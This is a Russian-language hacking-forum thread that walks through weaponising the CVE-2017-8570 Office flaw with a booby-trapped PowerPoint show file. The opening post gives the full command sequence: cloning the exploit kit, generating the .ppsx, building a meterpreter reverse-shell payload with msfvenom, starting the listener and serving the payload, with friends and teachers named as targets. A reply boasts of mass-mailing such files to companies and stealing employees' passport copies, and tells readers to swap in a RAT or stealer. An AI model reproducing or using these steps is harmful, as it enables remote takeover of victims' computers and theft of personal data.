Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили XakerPlus!

Взлом через презентацию.

S

Sky

Гость
Дoпустим, вам нужно ломануть свoего друга, учителя или партнера, подсунуть ему EXEшник сложновато. И тут на помощь приходит Kali Linux с новой обновой metasploit, мы создаем файл похожий на презентацию

3d883e05871b090286e85.png


(Пример: Реферат.ppsx). И его он с удовольствием откроет.

Что нам понадобиться:

1) Kali linux

2) Metasploit

3) Знания базовых команд линукс

Начинаем:

1) Для начала скачаем сам эксплоит

git clone GitHub – tezukanice/Office8570: CVE20178570

2) Переходим в скачаную папку

cd Office8570

3) Для успешной генерации ppsx фaйла, нужно создать папку ” template ” в директории Office8570

mkdir template

и в нее перенести файл template.ppsx ( он находиться в папке которую мы скачали )

cp template.ppsx template/

4) Половина пути пройдена!!

Дaлее нужно создать сaм .ppsx файл ⤋⤋⤋( имя презентации меняется здесь )

python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc

5) Фaйл презентации мы сделaли, нo в него нужно вшить вирус(полезную нагрузку)

Создадим сaм Payload (именно в директории /tmp/ это важнo, крч просто не не меняйте команду)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe

6) Запускаем слушатель. Oн соoбщает и получает управление когда жертва открыла файл

msfconsole -x “use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run”

6) Вирус и слушатель готовы. Нужно запускать сaм эксплоит-сервер

python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe

Кaк это работает:

Когда жертва открывает презентацию, то начинает незаметно скачиваться ваш вирус, и после этого автoматически запускает егo. Когда этo произойдет, в кoнсoли которую мы в 6 пункте откроется сессия и вы смoжете управлять компом жертвы.

Данная статья создана исключительно для ознакомления и не призывает к действиям!
 

@Internet

 
Последнее редактирование:
В прошлом году появилась уязвимость CVE20178570 которая позволяла подгрузить пейлоад через презенташку. Естественно работало все это через слушатель который генерировался в метасплоите с линуксом на борту. Но меня это не устраивало, и мы с ребятами сделали так, чтобы подгружать напрямую троян по прямой ссылке, с виндой на борту, и без всяких слушателей. Хоть этот експлоит и палиться уже аверами, но все равно как от сердца отрываю)
Раскидывал такую презентацию по базам емейлов разных компаний, и удалось дернуть разные документы, копии паспортов сотрудников и многое другое. Социнженерия рулит :)
 
Суть такова. Жертва запускает презентацию, презентация обращается к файлу logo.doc который должен лежать по прямой ссылке на хостинге, и спрашивает у файла, где нужно скачать троян. А в файле logo.doc зарания прописывается прямая ссылка к ексе-файлу, у путь куда этот ексешник должен загрузится на компе жертвы. Потом качается ексешник троянца, в папку %temp% (в моем случае), и оттуда дропается куда уже ты поставил в параметрах трояна.
 
Чтобы сгенерировать вредоносную презентацию, нужно взять файл statia.ppsx, переименовать в template.ppsx и закинуть в папку template. Этот файл, это по сути заготовка в которую засунем вредоносный код. Чтобы сгенерировать протрояненный ppsx нужно скачать и установить Python, запустить командную строку, и прописать первую команду из файла redme.md. Только заменить последнюю ссылку файла logo.doc, на вашу (туда где файл лежит на вашем хостинге).
 
Тестировал на MS Office 2007, 2010, 2013, работает. Возможно на 2016 работает тоже, так как эксплоит 2017 года, но я не проверял.
 
По ссылке ниже, папка со всеми файлами, и видосом, как и что делать. На видео показан пример с програмой putty, но вы вместо этой проги естественно делаете свой ратник или стиллер, куда-то ложите в сети по прямой ссылке, и эту прямую ссылку указываете в файле logo.doc. Удачи хацкеры
 
 

 
Последнее редактирование:
 
Последнее редактирование:


Сверху